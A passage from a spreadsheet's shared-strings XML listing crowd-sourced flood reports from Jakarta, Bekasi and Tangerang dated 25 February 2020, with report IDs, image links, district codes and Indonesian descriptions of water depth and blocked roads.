  <si>
    <t>https://images.petabencana.id/c67c4b07-6a4f-436d-b2ca-d99e075e6825.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "728", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kepu selatan. Bungur</t>
  </si>
  <si>
    <t>Bungur</t>
  </si>
  <si>
    <t>82c02508-246d-4505-8b2c-c10388428836</t>
  </si>
  <si>
    <t>https://images.petabencana.id/82c02508-246d-4505-8b2c-c10388428836.jpg</t>
  </si>
  <si>
    <t>Banjir di samping SMKN 33</t>
  </si>
  <si>
    <t>c2cd22d3-14b2-41d2-91c3-73251ee70298</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c2cd22d3-14b2-41d2-91c3-73251ee70298.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "8", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Daerah KCP Jelambar</t>
  </si>
  <si>
    <t>8dc59d5c-079b-40c1-b20c-342ef757b770</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1862", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sebetis</t>
  </si>
  <si>
    <t>d5c3a588-68eb-40db-8bba-bb66bd6e98ad</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d5c3a588-68eb-40db-8bba-bb66bd6e98ad.jpg</t>
  </si>
  <si>
    <t>Banjir di Perumahan Graha mustika media blok C (GMM) Setu, Bekasi.</t>
  </si>
  <si>
    <t>Lubangbuaya</t>
  </si>
  <si>
    <t>c83f24f7-5700-474a-a537-058e0a802222</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c83f24f7-5700-474a-a537-058e0a802222.jpg</t>
  </si>
  <si>
    <t>Kartini IX</t>
  </si>
  <si>
    <t>56d91f96-d89c-4f1f-92b2-f526657c0cca</t>
  </si>
  <si>
    <t>https://images.petabencana.id/56d91f96-d89c-4f1f-92b2-f526657c0cca.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 64, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "622", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan Berlian II, Kelurahan Sumur Batu Kecamatan Kemayoran</t>
  </si>
  <si>
    <t>95b0411b-02d0-4dda-a48b-ea9abbb6578f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/95b0411b-02d0-4dda-a48b-ea9abbb6578f.jpg</t>
  </si>
  <si>
    <t>Jalan Mataram 15 Kel. Bencongan, Kec. Kelapa Dua, Tangerang.</t>
  </si>
  <si>
    <t>21c2d0e1-d16d-448e-a5ba-fb78955c7f06</t>
  </si>
  <si>
    <t>https://images.petabencana.id/21c2d0e1-d16d-448e-a5ba-fb78955c7f06.jpg</t>
  </si>
  <si>
    <t>Banjir perum intan lestari</t>
  </si>
  <si>
    <t>67fd419a-0184-4eff-8fc5-c5e7b942c257</t>
  </si>
  <si>
    <t>https://images.petabencana.id/67fd419a-0184-4eff-8fc5-c5e7b942c257.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2575", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sepaha dan kendaraan bermotor memiliki kesulitan untuk lewat</t>
  </si>
  <si>
    <t>17a9ec6e-6b31-4939-b16a-fffcb542bc66</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "314", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>592257e0-e3c4-4dfa-b893-d096fb3f0738</t>
  </si>
  <si>
    <t>https://images.petabencana.id/592257e0-e3c4-4dfa-b893-d096fb3f0738.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1648", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>922a8d15-3c12-479d-81a4-997ece043309</t>
  </si>
  <si>
    <t>https://images.petabencana.id/922a8d15-3c12-479d-81a4-997ece043309.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "766", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di Jalan Danau Dampelas Bendungan Hilir Jakpus.</t>
  </si>
  <si>
    <t>7dd18972-9a86-41a9-af81-18a66d26017e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7dd18972-9a86-41a9-af81-18a66d26017e.jpg</t>
  </si>
  <si>
    <t>Genangan setengah betis</t>
  </si>
  <si>
    <t>fddf74b5-5147-485a-ac85-11e610f56a41</t>
  </si>
  <si>
    <t>Genangan</t>
  </si>
  <si>
    <t>36235fda-1d7f-4cb4-bb8f-f4210a37f65a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/36235fda-1d7f-4cb4-bb8f-f4210a37f65a.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "827", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Cipete Selatan</t>
  </si>
  <si>
    <t>886be9c6-ffb4-455d-b7ac-dceb8d107855</t>
  </si>
  <si>
    <t>https://images.petabencana.id/886be9c6-ffb4-455d-b7ac-dceb8d107855.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 92, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir sudah sepinggang orang dewasa motor tidak bisa lewat</t>
  </si>
  <si>
    <t>00af275c-b23c-4257-ab20-7c32a1417a9d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/00af275c-b23c-4257-ab20-7c32a1417a9d.jpg</t>
  </si>
  <si>
    <t>Daerah ini jarang banjir, tapi hari ini banjir sampe motor ga bisa jalan</t>
  </si>
  <si>
    <t>52a54466-265d-4810-b93f-e742b64c6768</t>
  </si>
  <si>
    <t>G</t>
  </si>
  <si>
    <t>443b1e3f-2f1b-4c37-9aad-5eb959767aa5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/443b1e3f-2f1b-4c37-9aad-5eb959767aa5.jpg</t>
  </si>
  <si>
    <t>Kampung Mede - Bekasi Jaya - Bekasi Timur</t>
  </si>
  <si>
    <t>2e6aac38-eada-4b1c-a757-052176bd8c43</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2e6aac38-eada-4b1c-a757-052176bd8c43.jpg</t>
  </si>
  <si>
    <t>KTB / KRM Jalan Krama Yudha, rawa terate, cakung, Jakarta</t>
  </si>
  <si>
    <t>92130514-4213-41a3-8da4-f08a37b5c52d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/92130514-4213-41a3-8da4-f08a37b5c52d.jpg</t>
  </si>
  <si>
    <t>Banjir di dalam rumah sudah sampai lutut. Sementara di luar rumah sudah sampai pinggang.</t>
  </si>
  <si>
    <t>da3133b8-39bf-41c4-afcf-54857c2eb795</t>
  </si>
  <si>
    <t>Banjir ketinggian 60cm</t>
  </si>
  <si>
    <t>468828b9-9bbe-4e00-b370-76ff578b4844</t>
  </si>
  <si>
    <t>https://images.petabencana.id/468828b9-9bbe-4e00-b370-76ff578b4844.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1507", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Foto tersebut diambil sekitar pukul 05.35 pagi dan hingga saat ini banjir sudah mulai surut</t>
  </si>
  <si>
    <t>8e11ec8b-d08e-4c4d-9515-e0d82264f233</t>
  </si>
  <si>
    <t>Banjir di jalan sepaha orang dewasa</t>
  </si>
  <si>
    <t>36cae47c-37aa-4b87-b018-a067377e6611</t>
  </si>
  <si>
    <t>https://images.petabencana.id/36cae47c-37aa-4b87-b018-a067377e6611.jpg</t>
  </si>
  <si>
    <t>Banjir di Perumahan Pondok Hijau Permai</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349531</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/25/15825934661087709899.jpg</t>
  </si>
  <si>
    <t>Banjir di Boulevard Hijau Kelapa Gading Setinggi 50cm</t>
  </si>
  <si>
    <t>Banjir sekitar 50cm di bulevar hijau harapan indah bekasi,</t>
  </si>
  <si>
    <t>e22a90d4-e242-4baa-ad16-347dd8772135</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e22a90d4-e242-4baa-ad16-347dd8772135.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "274", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Air tidak bisa lagi mengalir ke kali Sekretaris karena kali pun sudah tinggi airnya</t>
  </si>
  <si>
    <t>6de1e86c-2911-4311-be2c-0fa1b025f836</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6de1e86c-2911-4311-be2c-0fa1b025f836.jpg</t>
  </si>
  <si>
    <t>Mulai masuk banjir dari jam set 4 pagi tadi, sampai jam 9 ini blm surut juga</t>
  </si>
  <si>
    <t>65671878-835d-42f9-8ead-bd31c1f838b2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/65671878-835d-42f9-8ead-bd31c1f838b2.jpg</t>
  </si>
  <si>
    <t>Estimasi 25 - 40cm</t>
  </si>
  <si>
    <t>2bacaba4-0807-4a4c-99d9-b9dda64bf18c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2bacaba4-0807-4a4c-99d9-b9dda64bf18c.jpg</t>
  </si>
  <si>
    <t>Area galaksi, pekayon jaya</t>
  </si>
  <si>
    <t>cae35084-7ff2-4e62-a474-c1657349fc2b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cae35084-7ff2-4e62-a474-c1657349fc2b.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 96, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir hingga pinggang</t>
  </si>
  <si>
    <t>63086995-2db3-4a89-af68-342a41fcc88b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/63086995-2db3-4a89-af68-342a41fcc88b.jpg</t>
  </si>
  <si>
    <t>1cd10807-7a13-43f9-9dd5-ca2afcdf705d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1cd10807-7a13-43f9-9dd5-ca2afcdf705d.jpg</t>
  </si>
  <si>
    <t>Mts attaqwa 11 tambun utara</t>
  </si>
  <si>
    <t>c776b22c-6735-4b5e-97a6-f08a7a2260ec</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c776b22c-6735-4b5e-97a6-f08a7a2260ec.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1030", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir JL. Taman Widiacandra Banjir akibat luapan kali kerukut Kedalaman air di titik terdalam 20cm. Sekian"</t>
  </si>
  <si>
    <t>d571b518-e1bd-40c7-abdf-4ff496828f54</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d571b518-e1bd-40c7-abdf-4ff496828f54.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2349", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Area Jl. Swadaya I Semper Timur</t>
  </si>
  <si>
    <t>Semper Timur</t>
  </si>
  <si>
    <t>22fd2887-8f14-49e4-a78b-4be8129b8ffc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/22fd2887-8f14-49e4-a78b-4be8129b8ffc.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2560", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan RE setelah stasiun ancol banjir dan menyebabkan kemacetan</t>
  </si>
  <si>
    <t>952ab8a6-8141-4f46-8deb-16b44eea990e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/952ab8a6-8141-4f46-8deb-16b44eea990e.jpg</t>
  </si>
  <si>
    <t>Jam 6 pagi tgl 25/02/2020, sudah selutut</t>
  </si>
  <si>
    <t>beb6258c-5e2b-4d4a-949c-35370e8ce483</t>
  </si>
  <si>
    <t>https://images.petabencana.id/beb6258c-5e2b-4d4a-949c-35370e8ce483.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "62", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir kurang lebih setinggi 28 cm</t>
  </si>
  <si>
    <t>f7f06d0a-518d-47dd-b74c-094fb05911ad</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f7f06d0a-518d-47dd-b74c-094fb05911ad.jpg</t>
  </si>
  <si>
    <t>Komplek bermis kelapa gading</t>
  </si>
  <si>
    <t>0f4c3a36-77d3-43de-ab1d-5198dee7ca48</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0f4c3a36-77d3-43de-ab1d-5198dee7ca48.jpg</t>
  </si>
  <si>
    <t>b0ca3b09-f4fc-48e1-be9f-ecb51d66d3d2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b0ca3b09-f4fc-48e1-be9f-ecb51d66d3d2.jpg</t>
  </si>
  <si>
    <t>Banjir 40-50 cm taman pegangsaan indah</t>
  </si>
  <si>
    <t>4b307e6e-69c5-4663-8587-bb0b68589329</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4b307e6e-69c5-4663-8587-bb0b68589329.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "329", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Genangan air cukup tinggi,  cukup aman di lewati mobil, motor harus melewati jalur TransJakarta. Hati-hati banyak anak-anak bermain air.</t>
  </si>
  <si>
    <t>3422ca45-f9ed-4b90-b2ca-5f66e98fbed4</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2459", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir setinggi 10 cm</t>
  </si>
  <si>
    <t>fc3f589c-7e4a-4cd4-b96a-62dd37739c5c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fc3f589c-7e4a-4cd4-b96a-62dd37739c5c.jpg</t>
  </si>
  <si>
    <t>fe5c57bf-8342-4760-97b1-c0371b290f37</t>
  </si>
  <si>
    <t>JL Arjuna Selatan tidak bisa dilalui kendaraan. Lalu lintas kacau karena jalur tsb ramai</t>
  </si>
  <si>
    <t>c1cbcc4c-edfe-4d4b-8e81-3dbed70fb68e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c1cbcc4c-edfe-4d4b-8e81-3dbed70fb68e.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 112, "report_type": "flood" }</t>
  </si>
  <si>
    <t>2fc82e9b-b77f-487a-a309-5ab63fb957ea</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2fc82e9b-b77f-487a-a309-5ab63fb957ea.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 55, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1352", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kuburan TPU Menteng Pulo</t>
  </si>
  <si>
    <t>Menteng Dalam</t>
  </si>
  <si>
    <t>65a34d0a-05ed-4acf-ab68-9b4f1d57cc97</t>
  </si>
  <si>
    <t>https://images.petabencana.id/65a34d0a-05ed-4acf-ab68-9b4f1d57cc97.jpg</t>
  </si>
  <si>
    <t>7b42a3e9-8981-4cce-9c94-a8e7aa473578</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7b42a3e9-8981-4cce-9c94-a8e7aa473578.jpg</t>
  </si>
  <si>
    <t>Banjir selutut Org Dewasa Green Ville RW 09</t>
  </si>
  <si>
    <t>27a41947-8138-459c-abe3-00261bc5cf34</t>
  </si>
  <si>
    <t>https://images.petabencana.id/27a41947-8138-459c-abe3-00261bc5cf34.jpg</t>
  </si>
  <si>
    <t>Vila gading harapan 2 desa satriamekar kec. Tambun utara kab. Bekasi</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349540</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/25/15825971791684498410.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2266", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Di Depan Ancol, Pemotor Putar Balik Lalin Macet Total</t>
  </si>
  <si>
    <t>Para pengendara motor yang putar balik dari arah kota dan depan Ancol di karenakan banjir berakibat macet total arah Mangga Dua, Gunung Sahari</t>
  </si>
  <si>
    <t>5aa6affb-2a41-43d9-9540-7b278492b647</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5aa6affb-2a41-43d9-9540-7b278492b647.jpg</t>
  </si>
  <si>
    <t>70973c6a-4882-4b11-9c49-45f5c483e4f1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/70973c6a-4882-4b11-9c49-45f5c483e4f1.jpg</t>
  </si>
  <si>
    <t>Jl. Kebon Sirih Barat tergenang</t>
  </si>
  <si>
    <t>8a2a0866-2096-4a25-994d-aa93af6a173b</t>
  </si>
  <si>
    <t>Rawan banjir sekarang di daerah komplek. Masuk rumah sampai sebetis</t>
  </si>
  <si>
    <t>3b6eedd2-7695-4d21-9d3c-44e63cc06522</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3b6eedd2-7695-4d21-9d3c-44e63cc06522.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1846", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan haji ali ke arah paswanpres. Motor dituntun dan mobil tidak berani lewat.</t>
  </si>
  <si>
    <t>1c6b9060-6741-4868-8774-1b6ff6ac1f59</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1c6b9060-6741-4868-8774-1b6ff6ac1f59.jpg</t>
  </si>
  <si>
    <t>Kayumas selatan 1, Blok J, No.141. Terendam banjir. Kemungkinan semua jalan kayumas selatan area pulogadung semua terendam banjir.</t>
  </si>
  <si>
    <t>9344adb9-196b-44a5-af6e-f35b50a44439</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9344adb9-196b-44a5-af6e-f35b50a44439.jpg</t>
  </si>
  <si>
    <t>banjiiirrr</t>
  </si>
  <si>
    <t>92c05d47-3d37-47b2-8dd6-0756c784a3d9</t>
  </si>
  <si>
    <t>Menuju itc cempaka mas dari senen</t>
  </si>
  <si>
    <t>92e18bfb-47c8-473b-b904-85fd8a44cb3b</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 195, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-SU" }</t>
  </si>
  <si>
    <t>just for tes</t>
  </si>
  <si>
    <t>Hutabulu</t>
  </si>
  <si>
    <t>Siborong-Borong</t>
  </si>
  <si>
    <t>Tapanuli Utara</t>
  </si>
  <si>
    <t>Sumatera Utara</t>
  </si>
  <si>
    <t>6097aefe-15a6-413d-aab1-5c27391bae8c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6097aefe-15a6-413d-aab1-5c27391bae8c.jpg</t>
  </si>
  <si>
    <t>cc03dd87-def7-4809-937e-4fdc264b9409</t>
  </si>
  <si>
    <t>Pintu tol sunter</t>
  </si>
  <si>
    <t>7926d9df-da1c-4efc-8936-0f3cd14833e5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7926d9df-da1c-4efc-8936-0f3cd14833e5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1653", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>ceaabb1f-1592-44e8-a355-6f148cbc7218</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ceaabb1f-1592-44e8-a355-6f148cbc7218.jpg</t>
  </si>
  <si>
    <t>banjir, ga ada signal, ga ada listrik,  tolong cepat di benahinn</t>
  </si>
  <si>
    <t>35d73216-e565-4e0a-aa31-45d3f74e6a3e</t>
  </si>
  <si>
    <t>Depan Mall of Indonesia</t>
  </si>
  <si>
    <t>912d2d9e-138f-4c40-9ebb-86fcb3b7ba9f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/912d2d9e-138f-4c40-9ebb-86fcb3b7ba9f.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2409", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir betis</t>
  </si>
  <si>
    <t>59227952-3bc8-48cb-b886-0b884b51c8e2</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "508", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>genangan air depan lampu merah jalan batu</t>
  </si>
  <si>
    <t>75b331ff-ebb8-403a-a935-70d2ebcd4613</t>
  </si>
  <si>
    <t>https://images.petabencana.id/75b331ff-ebb8-403a-a935-70d2ebcd4613.jpg</t>
  </si>
  <si>
    <t>Banjir dekat wang dinasty</t>
  </si>
  <si>
    <t>cc6499f6-e359-4a47-b415-cb9c0d186aae</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cc6499f6-e359-4a47-b415-cb9c0d186aae.jpg</t>
  </si>
  <si>
    <t>34b2784e-60d3-4b46-8a58-c9b4c7329549</t>
  </si>
  <si>
    <t>https://images.petabencana.id/34b2784e-60d3-4b46-8a58-c9b4c7329549.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 96, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir bumi nasio</t>
  </si>
  <si>
    <t>f7a7f28c-a2bb-484b-902c-d7c19ca2d6c4</t>
  </si>
  <si>
    <t>Sumur batu</t>
  </si>
  <si>
    <t>a78d6548-ba92-4d0e-8c44-cf12b6a8bc85</t>
  </si>
  <si>
    <t>Banjir dari jam 5.30 tgl 25 Feb 2020</t>
  </si>
  <si>
    <t>b6252c7d-e229-4a0a-acfa-a296a4abbbc5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b6252c7d-e229-4a0a-acfa-a296a4abbbc5.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2415", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>3883b227-8e90-4b85-988c-9de0e0f41415</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3883b227-8e90-4b85-988c-9de0e0f41415.jpg</t>
  </si>
  <si>
    <t>Banjir menggenangi jalan, anak-anak main air</t>
  </si>
  <si>
    <t>884fca26-73cb-4730-b9aa-6e021c08a581</t>
  </si>
  <si>
    <t>https://images.petabencana.id/884fca26-73cb-4730-b9aa-6e021c08a581.jpg</t>
  </si>
  <si>
    <t>Air tergenang dijalan Lembang Duren Jaya Bekasi Timur</t>
  </si>
  <si>
    <t>d7c7badc-6e47-4f3d-8964-9083e8f0085d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d7c7badc-6e47-4f3d-8964-9083e8f0085d.jpg</t>
  </si>
  <si>
    <t>Area kelapa gading Timur</t>
  </si>
  <si>
    <t>a391d8d0-8810-4e41-8655-92c2fbd51381</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a391d8d0-8810-4e41-8655-92c2fbd51381.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "556", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir didekat underpass Senen. Ketinggian 30-40 cm</t>
  </si>
  <si>
    <t>5a225589-516b-413f-8d9c-69953e421060</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 9, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "493", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jalan turunan jembatan Roxy banji di 2 lajur paling kiri sekitar 5-9 cm tetapi warga melakukan blockade dan meminta uang</t>
  </si>
  <si>
    <t>0b0d5528-1e85-4b7f-a9fb-ffb6e0933473</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0b0d5528-1e85-4b7f-a9fb-ffb6e0933473.jpg</t>
  </si>
  <si>
    <t>Banjir  kurang lebih 20cm</t>
  </si>
  <si>
    <t>2a6991c2-d2cf-4190-9f64-426e06f75a04</t>
  </si>
  <si>
    <t>Banjir kawasan cipinang indah</t>
  </si>
  <si>
    <t>7d621ec1-1af3-4688-9670-b9337121ce79</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7d621ec1-1af3-4688-9670-b9337121ce79.jpg</t>
  </si>
  <si>
    <t>Kondisi terkini saat dilaporkan. Sekitar 30 cm</t>
  </si>
  <si>
    <t>b2a443dd-b842-42c0-9fab-099b7a7ea3f8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b2a443dd-b842-42c0-9fab-099b7a7ea3f8.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 38, "report_type": "flood" }</t>
  </si>
  <si>
    <t>290421e3-6095-44e7-8997-88c296731e67</t>
  </si>
  <si>
    <t>https://images.petabencana.id/290421e3-6095-44e7-8997-88c296731e67.jpg</t>
  </si>
  <si>
    <t>Jl. Boulevard Barat Kelapa Gading (seberang MOI) banjir kurang lebih 40-50 cm</t>
  </si>
  <si>
    <t>2b039d8d-6eb0-4d5f-8c43-6c9e7992166a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2b039d8d-6eb0-4d5f-8c43-6c9e7992166a.jpg</t>
  </si>
  <si>
    <t>Banjir di perumahan Villa Gading Harapan 2 untuk kondisi saat ini 9.50 pagi ketinggian di depan rumah mencapai dengkul orang dewasa</t>
  </si>
  <si>
    <t>c1e8eac5-962a-48ba-94c4-54156c76bb6b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c1e8eac5-962a-48ba-94c4-54156c76bb6b.jpg</t>
  </si>
  <si>
    <t>a6047533-0cce-4ffb-b54b-143e26a83ddb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a6047533-0cce-4ffb-b54b-143e26a83ddb.jpg</t>
  </si>
  <si>
    <t>Banjir di jl lingkungan III ketinggian antara 30-50cm, sedan dan motor tidak disarankan melintas</t>
  </si>
  <si>
    <t>482c7524-33bf-403c-80e2-ce6a4e460be6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/482c7524-33bf-403c-80e2-ce6a4e460be6.jpg</t>
  </si>
  <si>
    <t>3c779162-5e49-4454-b149-db4c79ad7e65</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3c779162-5e49-4454-b149-db4c79ad7e65.jpg</t>
  </si>
  <si>
    <t>Banjir dg ketinggian 65cm di komplek perumahan Griya Kencana 1 masjid At-Taqwa</t>
  </si>
  <si>
    <t>9d97a7c5-cc67-4418-8d26-ed5f2ff0fed0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9d97a7c5-cc67-4418-8d26-ed5f2ff0fed0.jpg</t>
  </si>
  <si>
    <t>c410df82-6b1d-455b-a0af-4c205979ec33</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c410df82-6b1d-455b-a0af-4c205979ec33.jpg</t>
  </si>
  <si>
    <t>17a62f69-4ea6-4a30-bc5d-d17ffd630151</t>
  </si>
  <si>
    <t>Perumahan Graha Prima, Tambun-Bekasi sudah terendam air sejak pagi hari ini.</t>
  </si>
  <si>
    <t>2521db5d-1050-4917-9e84-b746bee6bc16</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2521db5d-1050-4917-9e84-b746bee6bc16.jpg</t>
  </si>
  <si>
    <t>09.52 masih naik</t>
  </si>
  <si>
    <t>Sumberjaya</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349546</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2020/02/25/349546-15825982641708427919.mp4-03.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "2636", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Imbas Banjir Jalan Kebon Nanas Menuju Cawang UKI Ditutup</t>
  </si>
  <si>
    <t>Pagi ini jalan dari Kebon Nanas menuju Cawang UKI ditutup karena banjir di depan komplek Kemhan, lalulintas macet bagi pengendara bisa cari jalur alternatif lainnya #banjir #macet</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/349547</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2020/02/25/15825983352095467914.jpg</t>
  </si>
  <si>
    <t>Banjir 30cm di Blok AJ Perumahan Vila Gading Indah, Bekasi</t>
  </si>
  <si>
    <t>Banjir 30 cm menggenangi jalan Blok AJ perumahan Vila Gading Indah 1 Babelan Bekasi</t>
  </si>
  <si>
    <t>Kebalen</t>
  </si>
  <si>
    <t>11a052c2-9a54-4139-a9d4-0b1dc7cfdb33</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 1, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di pinggiran plaza semanggi dan sekitarnya</t>
  </si>
  <si>
    <t>a6f9d5be-cc4a-49ea-8665-7cbe703488a6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a6f9d5be-cc4a-49ea-8665-7cbe703488a6.jpg</t>
  </si>
  <si>
    <t>Banjir genangan akibat saluran air terlalu kecil</t>
  </si>
  <si>
    <t>7ab3bd44-7a08-4708-b657-4597b4185e3f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7ab3bd44-7a08-4708-b657-4597b4185e3f.jpg</t>
  </si>
  <si>
    <t>Tanjung duren dekat pasar patra (belakang esa unggul)</t>
  </si>
  <si>
    <t>4627db55-ed42-4a71-a750-d838ee599270</t>
  </si>
  <si>
    <t>JL. Export Barat 5 ketinggian sekitar 60cm</t>
  </si>
  <si>
    <t>28500ddc-2e81-415c-9b0f-ffa5fe2c2dd3</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "194", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Ranmor tidak dapat lewat</t>
  </si>
  <si>
